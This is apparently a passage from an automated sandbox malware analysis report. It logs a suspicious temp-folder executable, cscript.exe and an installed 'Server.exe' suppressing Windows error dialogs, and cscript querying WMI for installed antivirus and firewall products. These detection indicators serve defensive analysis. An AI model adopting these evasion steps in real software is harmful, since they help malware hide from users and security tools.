Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOOPENFILEERRORBOX

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)Show sources
Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from AntiVirusProduct
Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from AntiVirusProduct
Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from FirewallProduct
Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from FirewallProduct

Language, Device and Operating System Detection: